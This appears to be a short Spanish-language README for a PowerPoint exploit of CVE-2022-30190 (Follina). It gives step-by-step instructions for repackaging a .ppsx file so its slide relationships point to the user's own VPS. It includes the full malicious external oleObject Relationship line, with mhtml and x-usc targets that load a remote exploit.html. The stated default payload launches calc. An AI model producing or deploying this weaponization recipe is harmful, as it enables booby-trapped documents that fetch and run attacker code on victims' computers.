
Este es un exploit de CVE-2022-30190 en PowerPoint.
Esto es un exploit de CVE-2022-30190 en PowerPoint.
Modifica el sufijo del archivo a 'zip' y descomprime el archivo; puedes editar \ppt\slides\_rels\slide1.xml.rels y reemplazarlo con la ip:puerto de tu vps de la siguiente manera, luego comprímelos de la misma forma y cambia el sufijo a 'ppsx'. El payload por defecto en 'exploit.html' ejecuta calc.
<Relationship TargetMode="External" Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://114.114.114.114:80/exploit.html!x-usc:http://114.114.114.114:80/exploit.html"/>
referencia: https://github.com/chvancooten/follina.py